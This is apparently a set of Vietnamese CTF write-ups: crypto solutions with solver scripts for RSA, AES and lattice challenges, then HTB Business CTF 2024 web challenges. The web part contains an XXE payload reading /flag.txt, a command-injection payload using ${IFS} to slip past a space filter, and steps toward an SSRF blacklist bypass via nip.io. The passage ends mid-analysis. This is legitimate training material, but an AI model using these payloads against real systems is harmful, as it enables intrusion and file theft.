    r = 0x17bd57cb11862d85c09f1ab44734f7184ac5909ba3eeeb18c439833ebeeed43b711c75fcf302e31c18303daaa34a889c0005ad445e3822f75a151be3f9b0ee0691bad93efcd9741cb60fbea3b496cb321490fe696805abf958cb13b28429489214eeb2550b12876512dbc4fc20ee7ed72da896eca35e19fab9f6f45c8a46f8eedc50aea293ab1caac85a559804855aaa4a89a696225de33f099bdb7c67944e4ecb2e2d36427011f353acf2e21ad49f30519717fb373c819c0670e14d252570bd5e8ec454a861fe516bbcaee8664a61f0540f8068b5e9d427a7b34e191f4c3aa4d3bc05426f00a4fb4cf3d74afa8ad6f70797b9d01923b939ea1fc8d7fd8ca1f7
    s = 0xd56b8e0333b99b04cab487c1f54b1c8d4737b7ad1b1a2a19d972dc5cbca018596a6d529c5b07bf5dbd1c4eca998a26fa464c5f83eee7b50fc5bb6338633f9cca9e12fd53b6976f4394ceee049f2548f8be0679436ba2a4d845d5dbebfb0b16d2b97aad64d189dbd0a1197b6e6f0535b09641a9f1c6e950a12e0503090d170988204b806db26947fc3a652ebc45af35d4d2a8484ef90182638983cabbec2ad2eb85eefc6488630d27d3751802c7ee37bd6faa69686f85fc7a02844f421ee2bf60d5aff06c554c959d3b6eb30063ebca2edb149330fc04cfe7c7789f3a36ecc31cd985d0b7b1f78eea2f2b78c0b6ff30f68162c8073fd04ac88547fcf8610095f

    # https://www.geeksforgeeks.org/solve-linear-congruences-ax-b-mod-n-for-values-of-x-in-range-0-n-1/
    def ExtendedEuclidAlgo(a, b):

        # Base Case
        if a == 0 : 
            return b, 0, 1

        gcd, x1, y1 = ExtendedEuclidAlgo(b % a, a)

        # Update x and y using results of recursive
        # call
        x = y1 - (b // a) * x1
        y = x1

        return gcd, x, y

    def linearCongruence(A, B, N):

        A = A % N
        B = B % N
        u = 0
        v = 0

        # Function Call to find
        # the value of d and u
        d, u, v = ExtendedEuclidAlgo(A, N)

        # No solution exists
        if (B % d != 0):
            print("B mod gcd(k, n) != 0")
            exit()

        # Else, initialize the value of x0
        x0 = (u * (B // d)) % N
        if (x0 < 0):
            x0 += N

        # Pr all the answers
        for i in range(d):
            solutions.append((x0 + i * (N // d)) % N)

    # phương trình của ta là:
    # x*k = ((s - m*k) * pow(-r, -1, n)) % n

    found_d = False
    for k in trange(1, 2**20):
        if found_d: break
        solutions = []
        B = ((s - m*k) * pow(-r, -1, n)) % n

        if B % GCD(k, n) == 0:
            linearCongruence(k, B, n) # giải pt
            for i in set(solutions):
                if i.bit_length() <= 129:
                    print(f"{k = }")
                    print("d =", i)
                    found_d = True
                    break
    # k = 41600 
    # d = 299333094175056122872226309457434950402


Flag của ta:


Icecream but easier (easy/medium)


Source:

    from Crypto.Util.number import *
    from hashlib import sha256
    from Crypto.Cipher import AES
    from secret import flag
    from Crypto.Util.Padding import pad 

    # Copy from Wannagame Championship 2024
    class IceCream:
        def __init__(self, nbit: int):
            self.p = getPrime(nbit//2)
            self.q = getPrime(nbit//2)
            self.n = self.p * self.q
            self.phi = (self.p - 1) * (self.q - 1)
            # self.e = getPrime(16) # a harder version
            self.e = 10001
            self.secret1 = getPrime(384)
            self.secret2 = getPrime(384)
            self.d = inverse(self.e, self.phi)

        def wrap(self):
            c = pow(self.secret1, self.e, self.n)
            c += self.secret2
            self.secret1 = c 
            return c 


    def main() :

        cart = IceCream(512)
        for _ in range(4) :
            print(cart.wrap())

        key = sha256(str(cart.wrap()).encode()).digest()[:16]
        cipher = AES.new(key,AES.MODE_ECB)

        print(cipher.encrypt(pad(flag,16)).hex())


    main()

    """
    983988808468238406815261032742287398509539527772118186899154605157252213084385662543553125083212552614855410938487363846612472902230851873122019688775351 
    411920476721397965776323967885506259683504493586810231951685564745710311651646483406456114404428768195904417807999931167817184410508419226228074455888655
    4698285906809496129283017525468414276062165111247080417389967682278838749600348577192449627647158658589122409242574072399131912703350920146158705409829488
    2355255751438494111558900855149710130746636811000805924350928855795353027981395558758632216685403335142820213370399046347758646897427052652845539550759589
    b83519144a6ec70cf1d97e7b2bb952036e77260cac361ed742a190b3dddd1954717c41c8d8baaff729245b9a80e70e52d13150d59e12b6840f590102cb8a0891
    """


Quan sát source thì mình thấy rằng Flag của ta được mã hóa bằng AES và key của ta được tính từ key = sha256(str(cart.wrap()).encode()).digest()[:16], vậy ta sẽ tiến hành đi phân tích hàm wrap() của class IceCream.

Gọi secret1 là \(s_1\), secret2 là \(s_2\), hàm wrap() của ta có chức năng tính toán một giá trị \(c\) như sau:


$$c = (s_1^e \mod n) + s_2$$

Và sau đó nó gán giá trị của \(c\) vừa tính được cho \(s_1\) và lặp lại quá trình tính toán trên. Vì Challenge lặp hàm wrap() 4 lần nên ta có 4 phương trình như sau:

$$c_1 = (s_1^e \mod n) + s_2 \hspace{5mm} (1)$$
$$c_2 = (c_1^e \mod n) + s_2 \hspace{5mm} (2)$$
$$c_3 = (c_2^e \mod n) + s_2 \hspace{5mm} (3)$$
$$c_4 = (c_3^e \mod n) + s_2 \hspace{5mm} (4)$$

Bây giờ yêu cầu của Challenge chính là tính được chính xác giá trị tiếp theo là \(c_5\), công thức như sau:

$$c_5 = (c_4^e \mod n) + s_2$$

Ta cần tìm \(s_2\), đã có giá trị của \(c_4\), \(c_3\) và \(e\), tính giá trị của \(s_2\) như sau:

$$s_2 = c_4 - (c_3^e \mod n)$$

Có được \(s_2\) thì ta thay vào phương trình \((1)\) là có \(c_5\), bài toán kết thúc. Nhưng mà chúng ta chưa có modulus \(n\). Vậy việc cần làm đầu tiên là tìm lại modulus \(n\).

Đầu tiên ta lấy phương trình \((3)\) trừ phương trình \((2)\) và lấy phương trình \((4)\) trừ phương trình \((3)\) được hai phương trình như sau:


$$c_3 - c_2 = c_2^e - c_1^e \mod n$$
$$c_4 - c_3 = c_3^e - c_2^e \mod n$$

Chuyển vế phải sang và bỏ phép \(\mod n\) ta được hai phương trình sau:

$$c_3 - c_2 - (c_2^e - c_1^e) = 0 + k_1 \times n \hspace{5mm} (*)$$
$$c_4 - c_3 - (c_3^e - c_2^e) = 0 + k_2 \times n \hspace{5mm} (**)$$

Vì đã có các giá trị \(c_2, c_3, c_4\) nên khi ta tính \(GCD\) của biểu thức \((*)\) và \((**)\) thì ta sẽ có ước chung là giá trị \(n\), bài toán kết thúc.

Script:
  from Crypto.Util.number import *
  from hashlib import sha256
  from Crypto.Cipher import AES
  from Crypto.Util.Padding import pad 

  e = 10001
  c1 = 983988808468238406815261032742287398509539527772118186899154605157252213084385662543553125083212552614855410938487363846612472902230851873122019688775351 
  c2 = 411920476721397965776323967885506259683504493586810231951685564745710311651646483406456114404428768195904417807999931167817184410508419226228074455888655
  c3 = 4698285906809496129283017525468414276062165111247080417389967682278838749600348577192449627647158658589122409242574072399131912703350920146158705409829488
  c4 = 2355255751438494111558900855149710130746636811000805924350928855795353027981395558758632216685403335142820213370399046347758646897427052652845539550759589
  ct = "b83519144a6ec70cf1d97e7b2bb952036e77260cac361ed742a190b3dddd1954717c41c8d8baaff729245b9a80e70e52d13150d59e12b6840f590102cb8a0891"

  n1 = c3 - c2 - (pow(c2, e) - pow(c1, e))
  n2 = c4 - c3 - (pow(c3, e) - pow(c2, e))

  n = GCD(n1, n2)
  s2 = (c4 - pow(c3, e, n)) % n
  c5 = pow(c4, e, n) + s2
  key = sha256(str(c5).encode()).digest()[:16]
  cipher = AES.new(key, AES.MODE_ECB)
  print(cipher.decrypt(bytes.fromhex(ct)))



Flag: KCSC{1_607_570m4ch4ch3_b34c4u53_347_700_much_1c3cr34m}
Crypto 2 (hard)


Source:
  from Crypto.Util.number import *
  from os import urandom

  flag = b"KCSC{fake_flag}"
  padding = urandom(1000 - len(flag))
  flag = padding[: (1000 - len(flag))//2] + flag + padding[(1000 - len(flag))//2 :]

  p = getPrime(1024)
  q = getPrime(512)
  e = 0x10001

  n = p * q
  c = pow(bytes_to_long(flag), e, n)

  key = q
  ks = []
  noises = []

  for i in range(15):
      noise = key + 3*i + 5
      noise_inv = inverse(noise, p)
      k = (noise_inv * noise - 1) // p

      ks.append(k)
      noises.append(noise_inv % 2**562)

  with open("data.txt","w") as f:
      f.write(f"{n = }\n{noises = }\n{ks = }\n")


data.txt
  c = 958390793518378697087296421800510334363447372842473258361270888061359845988062617160847787493538009149015476122598987518417419094843072448103313497164473296044057151262149271633030868336861854949936583056107714557666720454320727670426024759878104055294508600827276053390768097909341499650595336630811407938767958056612000718155852086280949620705266088823405319610741770144481342370840316322962959361700770145395482234905665577476137556580613854059161166908076563
  noises = [7855711876569802238862413165275600906813725762035718788939102158061380227877261762058163252276012974919613869744386471326379360599551714048814350682844653203632596811700, 11016762668854429203921748552171961540330601718050664348323205797201647566906360457303813510699134610808048666995818660000595371281648507789977635794049527374670915074820, 11546537801915447264802137334545592446958309083548637512152243512181257950929398818955898367116157381845553377528332628838810077828034595899755565832327915425781910578439, 14830729778111523754153466930320460677549254575098428551135275406990012856666239121852688775241624133868906117915735977555517436901488865149110824895148729747382400302735, 12907187256704172729107731584833713827465378465099977282577640066526827100848547817920519272964340115432388355503430889687196818282392932653498115462633041044503277974348, 12138846625255592521563612083084082981604248578123108209967521720915214134631110004822440010797002143437417645081236617079726153719130327393125423457708193164785079343086, 739523797727999924234547033495024454536077879042322224023692246011372669433295815544499023380041352962654821966906221244535621757121658976493022103991684410944260441162, 10912720975459354397739596143674407139194119895970368719866752943212477569655440757739848406867091021804581233694510089684679552007293849432444225461324183971137511847850, 5808807130421099726863129210954911380673640771955929374201995801529194903892832719794393448564558695251305267337407921976623897457446026039650140168312597722101737867377, 6870714010059053187003558056421661621211755459105144640275368103761664542845966933600910306834129475974876509027992589543452526949905158943937805162971925181177623545706, 14001977026303213753344771778959822998356523953467938417570588825474587458038917314981845799115762940916991783878210493664223158815126302912780685563402149348230275770190, 2703973027755031256526864275850359824471693408893668839490715558453757417896110268005975650433171168484478679910175856477619764900062649145928051355223654355802268429828, 2197799411096076134244174423868396977861502716614420367844698041028287534815946837970931537722713608970852047499736568341768228551190841854816687141278293724986033804833, 6075559627298470723737160139773692997034806166978942024860600924417526676075369730013184451780131430065519578644230326849609926904745308079312413920535221565905507405787, 6192265537641579777321105222372552667784798470028740666393274098101434097162631461434169230747053524655097972801202035288143826479354640729278654236265719132207498664412]
  ks = [188342419899480149536884744017610449040092383019272248788959474691994413969719059118388685743603155504636227720165256840721069157015807449049211460253193, 2524032492075863404568209983324668522574966560976022920474303041695931745292134024805133065252540879869398798070277250051370058237130781549140268588979741, 3668089499830133831067934187396832654741712179290611321105361394043708714207354289456329073317267896181461996357656482682562832756019136386463281668147597, 787787910858589886444577841106414412143077182871445558404189242413347285556605603096222171073736492222727597718358413446678740896394491930381038665121984, 5969746486150167662037133056426653272095571564362080467447908647771862414810883039477641097271866604770772719228490891456621179456874478543312762101011945, 3953217233915265744392631383349005252504986319285163722465977735607534480220118278786439611479721354895554188803942058684275260525947213712273507161369083, 4703008646650559151263915675980342869678582333983285387772678033375440253018051362888097872035173512023181428217784439917007569473323902339013784947548817, 4501690793684706714453057890878006909948693156550389759496860753395691942571265613093123643690372231103171045523407714153581252263042363624513611315744787, 2874911234935885776724870513977581714604232366383062929938550655871436461399856184577119939177694657465354516516047758735724966092696982807333754161121763, 6807368946443140675648934273041372592283914654163350087761898286033102359032462642892185826153908771772176615450328348070881136865613927396914213307028823, 278211494072033197885754804219785966600017003124368934336640552995267695544391267083052940908660042483493904705872074416528235534610757303534430447847433, 1558365191956305255182334966416705368442755011866281958336373678292946152152443736046507333024441976071233683858273758166768326012234742351338218885065893, 3485367897376122736793872341240247397026215356530797459918379349421401150937114097374676678036857389576159611944092267415794839255765051218093322919755447, 2515456897351178494301823923332414671089420746643455306358829413922283380911750878593348268259769997426299206977825772717836168569349433038297458642933154, 4092447245860483948794687799772397211468262697039308695517969469204107269630882626451514975266106190665554492836842864230426192321181584429136242874419201]


Một Challenge khó về Lattice, mình cũng chưa thể hiểu tường tận Lattice nên nếu bên dưới mình có nhầm lần hay ghi gì chưa đúng thì các bạn nhắc mình nha.

Trong khi giải diễn ra thì mình không làm được bài này nên sau khi giải kết thúc mình có thao khảo Wu của anh @nomorecaffeine để làm theo, anh giải thích rất chi tiết nên mình thấy bài này rất hay và dễ hiểu, sau đây là wu của mình về những gì mình hiểu.

Đọc sơ qua source thì mình thấy rằng Flag được mã hóa bằng RSA với mũ \(e = 65537\) nên ta phải tìm được hai số nguyên tố \(\text{p,q}\) thì mới giải mã \(\text{c}\) được.




Source cho ta các dữ kiện sau:

$$\begin{split} \text{noises} &= [\text{noise}{\text{inv256_0}}, \text{noise}{\text{inv256_1}},\text{noise}{\text{inv256_2}}, \dots, \text{noise}{\text{inv256_14}}]\\ \text{ks} &= [\text{k}_0,\text{k}_1, \text{k}2, \dots, \text{k}{14}] \end{split}$$

Phân tích đoạn sau:
  key = q
  ks = []
  noises = []

  for i in range(15):
      noise = key + 3*i + 5
      noise_inv = inverse(noise, p)
      k = (noise_inv * noise - 1) // p

      ks.append(k)
      noises.append(noise_inv % 2**562)


Biết được công thức \(\text{noise}_{\text{inv256_i}}\) là:


$$\text{noise}{\text{inv256_i}} \equiv \text{noise}{\text{inv_i}} \pmod {2^{562}} \hspace{5mm} (*)$$

Giá trị \(\text{k}_{\mathbf{i}}\) là:

$$\text{noise}{\text{inv_i}} \times \text{noise}{\mathbf{i}}= 1 + \text{k}_{{\mathbf{i}}} \times \text{p} \hspace{5mm} \forall \mathbf{i} \in \left\{ 0,1,2,\cdots 14\right\} \hspace{5mm} (**)$$

Ý tưởng của tác giả là phải tìm được \(\text{p}\) và \(\text{q}\) thông qua các phương trình \((**)\)

Có hai mục tiêu ta cần phải làm đó là tìm p và tìm q, phải tìm cả hai vì Challenge chưa cho n. Ta sẽ dựa vào phương trình \((**)\) để đi tìm q trước.

Đầu tiên, từ \((*)\) Ta biến đổi giá trị của \(\text{noise}_{\text{inv}}\) thành:


$$\text{noise}{\text{inv_i}} = \text{noise}{\text{inv256_i}} + \text{a}_{\mathbf{i}} \times 2^{562} \hspace{5mm} \forall \mathbf{i} \in \left\{ 0,1,2,\cdots 14\right\} \hspace{5mm} (1)$$

Tiếp theo mod giá trị của \(\text{p}\) với \(2^{562}\) và bỏ phép mod, ta được:

$$\text{p} = \text{p'} + \text{b} \times 2^{562} \hspace{5mm} (2)$$

Thế cả \((1)\) và \((2)\) vào phương trình \((**)\) được:

$$(\text{noise}{\text{inv256_i}} + \text{a}{\mathbf{i}} \times 2^{562}) \times \text{noise}{\mathbf{i}} = 1 + \text{k}{{\mathbf{i}}} \times (\text{p'} + \text{b} \times 2^{562})$$

Phân phối, chuyển vế các giá trị chứa \(2^{562}\) sang bên trái, ta được:

$$\text{a}{\mathbf{i}} \times \text{noise}{\mathbf{i}} \times 2^{562} - \text{k}{{\mathbf{i}}} \times \text{b} \times 2^{562} = 1 - \text{noise}{\text{inv256_i}} \times \text{noise}{\mathbf{i}} + \text{k}{{\mathbf{i}}} \times\text{p'} \hspace{5mm} (***)$$

Sau đó ta mod hai vế cho \(2^{562}\) và được phương trình mới:

$$1 - \text{noise}{\text{inv256_i}} \times \text{noise}{\mathbf{i}} + \text{k}_{{\mathbf{i}}} \times\text{p'} \equiv 0 \pmod {2^{562}}$$
$$\Leftrightarrow 1 - \text{noise}{\text{inv256_i}} \times (\text{q} + 3 \times \mathbf{i} + 5) + \text{k}{{\mathbf{i}}} \times\text{p'} \equiv 0 \pmod {2^{562}} \hspace{5mm} \forall \mathbf{i} \in \left\{ 0,1,2,\cdots 14\right\}$$

Đây là một phương trình modulo có hai ẩn là \(\text{q}\) và \(\text{p'}\), và có đến 15 phương trình nên việc giải hệ này là khả thi.

Có nhiều cách giải hệ nhưng mình sẽ thử cách mới mà hồi giờ chưa dùng đó là sử dụng phương thức groebner_basis() của thư viện sagemath, dùng để đơn giản tập sinh của một Ideal trong vành đa thức. Hay có thể hiểu là nó giúp đơn giản hóa phương trình ban đầu và biến nó thành một phương trình đơn giản, dễ giải hơn.

Code:
  from sage.all import *
  x, y = PolynomialRing(Zmod(2**562), ["x", "y"]).gens()

  I = Ideal([
      1 - noises[0] * (x + 5) + ks[0] * y,
      1 - noises[1] * (x + 8) + ks[1] * y,
      1 - noises[2] * (x + 11) + ks[2] * y
  ])
  print(I.groebner_basis())
  #[x + 15095849699286157176165192141574519938693899918427427740708979667686108913040888895928594081761428218515984585906870777122468994835321959450919640276403457857023062016735, y + 8046359343118037782228277823598020857453001371030183803247456593467443731321455063833959619491793509652535546439016536857407146846080157709770883346704338364262578059073]


Có thể thấy là hệ phương trình của ta đã được đơn giản hóa thành dạng \(x + a \equiv 0 \pmod {2^{562}}\) và \(y + b \equiv 0 \pmod {2^{562}}\) để có \(\text{q}\) và \(\text{p'}\) ta chỉ cần tính:


$$\left\{\begin{matrix} \text{q} = 2^{562} - a \\ \text{p'} = 2^{562} - b \end{matrix}\right.$$

Vậy là tính được \(q\) rồi, mục tiêu tiếp theo là tìm \(p\)


Có \(\text{q}\) và \(\text{p'}\) thì ta sẽ đi tìm \(\text{b}\), vì \(\text{p} = \text{p'} + \text{b} \times 2^{562}\) nên ta chỉ cần đi tìm \(\text{b}\) là có \(\text{p}\).

Đặt \(\text{noise}_{\mathbf{i}} = n_{\mathbf{i}}\). Dựa vào phương trình \((***)\) ta lập được một cơ sở Lattice như sau:


$$M = \begin{pmatrix} -k_0 \cdot 2^{562} &-k_1 \cdot 2^{562} &\cdots &-k_{14} \cdot 2^{562} &1 & & & & &\\ n_0 \cdot 2^{562} &0 &\cdots &0 & &1 & & & &\\ & n_1 \cdot 2^{562} &\cdots &0 & & &1 & & &\\ \vdots &\vdots &\ddots &\vdots & & & & \ddots & &\\ & &\cdots &n_{14} \cdot 2^{562} & & & & &1 & \\ -v_0 &-v_1 &\cdots &-v_{14} & & & & & &1 \end{pmatrix}$$

Với vi là vế phải của phương trình \((***)\).


Sau khi áp dụng LLL với ma trận M, ta sẽ được một vector chứa 32 phần tử như sau:

$$[0, 0, \dots, 0, \text{b}, a_0, a_1, \dots, a_{14}, 1]$$

Giá trị b sẽ nằm ở index thứ 15.


Code:
  from sage.all import *
  from Crypto.Util.number import *

  M = []
  vs = []

  q = 8232801026182378555624973784963238333972795845533296387736527706512415912818949206851649888914216184602476613343684377211079326096729327326317574519291169
  p_ = 7049490356168127626737940500355054706214683510635577910257368607515052918247140344510547281218841560513337953684038842741675191673619012820474853659026445810335003248831

  assert is_prime(q)

  M.append([-ks[i] * 2**562 for i in range(15)])

  for i in range(15):
      d = q + 3 * i + 5
      v = -(1 - d * noises[i] + ks[i] * p_)
      vs.append(v)

      row = [0]*(15)
      row[i] = d * 2**562
      M.append(row)

  M.append(vs)

  M = matrix(M)
  M = M.augment(identity_matrix(17))
  L = M.LLL()

  print(L[0][15])


Giá trị \(\text{b}\):
  

Có \(\text{b}\) là có được \(\text{p}\) rồi, ta sẽ tính được khóa bí mật \(\text{d}\) và bài toán kết thúc:
  from Crypto.Util.number import *
  b = 9973918226342931101713742759510102202832949751016016433335951379486864420606419272916855340660179601297616652770791167118160222182913331004
  p_ = 7049490356168127626737940500355054706214683510635577910257368607515052918247140344510547281218841560513337953684038842741675191673619012820474853659026445810335003248831
  q = 8232801026182378555624973784963238333972795845533296387736527706512415912818949206851649888914216184602476613343684377211079326096729327326317574519291169
  c = 958390793518378697087296421800510334363447372842473258361270888061359845988062617160847787493538009149015476122598987518417419094843072448103313497164473296044057151262149271633030868336861854949936583056107714557666720454320727670426024759878104055294508600827276053390768097909341499650595336630811407938767958056612000718155852086280949620705266088823405319610741770144481342370840316322962959361700770145395482234905665577476137556580613854059161166908076563
  e = 65537

  p = p_ + 2**562 * b
  assert isPrime(p) and isPrime(q)

  n = p*q
  d = pow(e, -1, n-p-q+1)

  print(long_to_bytes(pow(c, d, n)))


Flag:



HTB Business CTF 2024: The Vault Of Hope Write Up
Anh Quỳnh — Tue, 28 May 2024 07:37:22 GMT

Web
Jailbreak
credit: nartgnourt

Solution
Truy cập vào vào URL của challenge, mình thấy một trang web như sau:

Lần lượt xem qua từng tab trong menu, mình chú ý tới tab ROM, mình nghĩ có thể khai thác lỗ hổng XXE tại đây:

Ứng dụng cho phép mình nhập vào dữ liệu với định dạng XML để cập nhật firmware. Trước tiên, mình thử nhấn nút Submit thì thấy giá trị của Version được trả về trong response:

Mình thử thay giá trị của nó thành abc và cũng nhận về response chứa abc:

Như vậy, mình có thể thử tham chiếu tới external entity trong phần tử Version. Bởi vì mô tả của challenge có nói flag nằm ở /flag.txt nên mình định nghĩa một external entity &abc; với giá trị là nội dung của file /flag.txt bằng cách sử dụng payload sau:
foo [abc SYSTEM "/flag.txt"> ]>

Submit và mình đã thành công lấy được flag:

Flag
HTB{b1om3tric_l0cks_4nd_fl1cker1ng_l1ghts_fd953ca827f9938c299f77118208aa70}
HTB Proxy
credit: Ngọc Trần
Your team is tasked to penetrate the internal networks of a raider base in order to acquire explosives, scanning their ip ranges revealed only one alive host running their own custom implementation of an HTTP proxy, have you got enough wit to get the job done?
web_htb_proxy.zip
Challenge cung cấp cho chúng ta trang web tĩnh với nội dung cho biết một reverse proxy đang chạy

Hãy đi sâu vào phân tích source code ta có thể thấy, challenge cung cấp cho ta hai đoạn code xử lý với reverse proxy được xử lý bằng golang và backend được xử lý thông qua NodeJS
.
├── Dockerfile
├── build_docker.sh
├── challenge
│   ├── backend
│   │   ├── index.js
│   │   └── package.json
│   └── proxy
│       ├── go.mod
│       ├── includes
│       │   └── index.html
│       ├── main.go
│       └── test.py
├── config
│   └── supervisord.conf
├── entrypoint.sh
└── flag.txt

Command Injection in ip-wrapper
Ở đoạn code xử lý backend, ta thấy hai routes được xử lý đó là /getAddresses và /flushInterface. Ở /flushInterface, có một đoạn xử lý đặc biệt ipWrapper.addr.flush(interface) giúp xóa tất cả các địa chỉ IP trong một interface cụ thể. Khi đi sâu vào lib, ta có thể thấy ở flush, đoạn code xử lý exec(`ip address flush dev ${interfaceName}`, (error, stdout, stderr)

Với interfaceName ở đây được truyền vào thông qua params interface nói trên.
Wait, we can trigger RCE here !!!

Thay vì truyền một interface bình thường, ta hoàn toàn có thể trigger RCE thông qua việc truyền command ; mv /fl* /app/proxy/includes/index.html. Tuy nhiên ta vẫn cần phải bypass qua xử lý middleware
const validateInput = (req, res, next) => {
    const { interface } = req.body;

    if (
        !interface || 
        typeof interface !== "string" || 
        interface.trim() === "" || 
        interface.includes(" ")
    ) {
        return res.status(400).json({message: "A valid interface is required"});
    }

    next();
}

Ở đây ta thấy nó loại bỏ các khoảng trống trong interface truyền vào thông qua trim(), để bypass ta có thể truyền vào ${IFS}. ($IFS là một biến đặc biệt trong shell nó chứa các ký tự khoảng trắng (khoảng trắng, tab, dấu xuống dòng)

Như vậy thông qua phương thức flush ta hoàn toàn có thể trigger RCE thông qua ;mv${IFS}/fl*${IFS}/app/proxy/includes/index.html
Tuy nhiên vấn đề xảy ra khi ta không thể truy cập vào endpoint flushInterface

Có vẻ đoạn code Golang xử lý reverse proxy đã chặn việc truy cập vào /flushInterface
Ta tiếp tục phân tích đoạn code xử lý reverse proxy

Đúng như mình dự đoán ở đây Golang đã chặn việc sử dụng endpoint flushInterface thông qua việc nó kiểm tra xem URL của yêu cầu có chứa chuỗi "flushinterface" (không phân biệt hoa thường) hay không và trả về Not Allowed.
SSRF to get content
Tiếp tục phân tích script xử lý golang mình tìm thấy một số đoạn code đáng chú ý:
if request.URL == string([]byte{47, 115, 101, 114, 118, 101, 114, 45, 115, 116, 97, 116, 117, 115}) {
        var serverInfo string = GetServerInfo()
        var responseText string = okResponse(serverInfo)
        frontendConn.Write([]byte(responseText))
        frontendConn.Close()
        return
    }

Tại endpoint /server-status, nó sẽ trả về GetServerInfo()
func GetServerInfo() string {
    hostname, err := os.Hostname()
    if err != nil {
        hostname = "unknown"
    }

    addrs, err := net.InterfaceAddrs()
    if err != nil {
        addrs = []net.Addr{}
    }

    var ips []string
    for _, addr := range addrs {
        if ipNet, ok := addr.(*net.IPNet); ok && !ipNet.IP.IsLoopback() {
            if ipNet.IP.To4() != nil {
                ips = append(ips, ipNet.IP.String())
            }
        }
    }

    ipList := strings.Join(ips, ", ")

    info := fmt.Sprintf("Hostname: %s, Operating System: %s, Architecture: %s, CPU Count: %d, Go Version: %s, IPs: %s",
        hostname, runtime.GOOS, runtime.GOARCH, runtime.NumCPU(), runtime.Version(), ipList)

    return info
}

Bao gồm các thông tin như Hostname, Operating System, Architecture, … và đặc biệt là IPs. Ta hãy chú ý đến method IsLoopBack, nó sẽ check xem địa chỉ IP có phải địa chỉ LoopBack hay không. Địa chỉ LoopBack là các địa chỉ như 127.0.0.1, ::1, … Như vậy mục đích ở đây là loại bỏ các ip localhost như 127.0.0.1 hay ::1.
Tiếp đến ta có thể thấy một số đoạn code xử lý blacklist
blacklistCheck
func blacklistCheck(input string) bool {
    var match bool = strings.Contains(input, string([]byte{108, 111, 99, 97, 108, 104, 111, 115, 116})) || // localhost
        strings.Contains(input, string([]byte{48, 46, 48, 46, 48, 46, 48})) || // 0.0.0.0
        strings.Contains(input, string([]byte{49, 50, 55, 46})) || // 127.
        strings.Contains(input, string([]byte{49, 55, 50, 46})) || // 172.
        strings.Contains(input, string([]byte{49, 57, 50, 46})) || // 192.
        strings.Contains(input, string([]byte{49, 48, 46})) // 10.

    return match
}

Kiểm tra bất kì chuỗi con nào truyền vào có chứa các giá trị nhạy cảm như 0.0.0.0, 127., …
checkMaliciousBody
func checkMaliciousBody(body string) (bool, error) {
    patterns := []string{
        "[`;&|]",
        `\$\([^)]+\)`,
        `(?i)(union)(.*)(select)`,
        `.*?`,
        `\r\n|\r|\n`,
        `.*?>`,
    }

    for _, pattern := range patterns {
        match, _ := regexp.MatchString(pattern, body)
        if match {
            return true, nil
        }
    }
    return false, nil
}

Xem phần body có chứa các giá trị liên qua đến một số kiểu tấn công như CRLF, SQLi hay XSS, …
checkIfLocalhost
func checkIfLocalhost(address string) (bool, error) {
    IPs, err := net.LookupIP(address)
    if err != nil {
        return false, err
    }

    for _, ip := range IPs {
        if ip.IsLoopback() {
            return true, nil
        }
    }

    return false, nil
}

Kiểm tra xem chuỗi truyền vào có phải địa chỉ IP localhost hay không
var hostAddress string = hostArray[0]
var isIPv4Addr bool = isIPv4(hostAddress)
var isDomainAddr bool = isDomain(hostAddress)

if !isIPv4Addr && !isDomainAddr {
    var responseText string = badReqResponse("Invalid host")
    frontendConn.Write([]byte(responseText))
    frontendConn.Close()
    return
}

isLocal, err := checkIfLocalhost(hostAddress)
if err != nil {
    var responseText string = errorResponse("Invalid host")
    frontendConn.Write([]byte(responseText))
    frontendConn.Close()
    return
}

if isLocal {
    var responseText string = movedPermResponse("/")
    frontendConn.Write([]byte(responseText))
    frontendConn.Close()
    return
}

isMalicious, err := checkMaliciousBody(request.Body)
if err != nil || isMalicious {
    var responseText string = badReqResponse("Malicious request detected")
    prettyLog(1, "Malicious request detected")
    frontendConn.Write([]byte(responseText))
    frontendConn.Close()
    return
}

Kiểm tra xem địa chỉ truyền vào có phải là IPv4 hoặc một domain thông qua việc sử dụng 2 function: isIPv4 và isDomain
isIPv4
func isIPv4(input string) bool {
    if strings.Contains(input, string([]byte{48, 120})) {
        return false
    }
    var ipv4Pattern string = `^(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$`
    match, _ := regexp.MatchString(ipv4Pattern, input)
    return match && !blacklistCheck(input)
}

Tại isIPv4 đoạn code sử dụng một đoạn regex lớn để check xem địa chỉ truyền vào có phải địa chỉ IP hợp lệ, thậm chí nó còn được sử dụng để tránh bypass việc encode IP thông qua việc bypass cả các kí tự chứa 0x
isDomain
func isDomain(input string) bool {
    var domainPattern string = `^[a-zA-Z0-9-]+(\.[a-zA-Z0-9-]+)*(\.[a-zA-Z]{2,})$`
    match, _ := regexp.MatchString(domainPattern, input)
    return match && !blacklistCheck(input)
}

Tại isDomain, golang kiểm tra xem dữ liệu đầu vào có phải là một tên miền hợp lệ và không nằm trong blacklist
Ta thấy dường như những config này ngăn chặn chúng ta khỏi việc tấn công SSRF qua việc truyền vào IP localhost nhằm bypass proxy để có thể get respone từ server nodejs. Dường như tất cả các kĩ thuật thông thường nhằm trigger SSRF đều không thành công vượt qua Blacklist này. Mất một thời gian tìm hiểu thì mình biết được ngoài việc trigger SSRF thông thường ta còn có thể sử dụng một kỹ thuật đó là DNS Binding thông qua việc sử dụng nip.io.
Nip.io là một dịch vụ DNS tự động chuyển đổi địa chỉ IP thành tên miền phụ dựa trên định dạng nhất định. Ví dụ, nếu địa chỉ IP của máy chủ là 192.0.2.1, ta có thể truy cập vào máy chủ đó bằng cách sử dụng tên miền phụ "192.0.2.1.nip.io".

Vậy liệu ta có thể bypass SSRF blacklist thông qua việc sử dụng nip.io? Câu trả lời là chưa?

Vì giá trị Host truyền vào vẫn chứa giá trị 127. nên là vẫn chưa thể bypass qua SSRF
Mình tiếp tục thử việc encode địa chỉ ip

Tuy nhiên vấn đề này vẫn chưa được giải quyết do đoạn xử lý tại checkIfLocalhost

Hey Wait !!! I forgot something, miss /server-status

Khi truy cập vào endpoint này nó sẽ cung cấp cho chúng ta địa chỉ ip của container

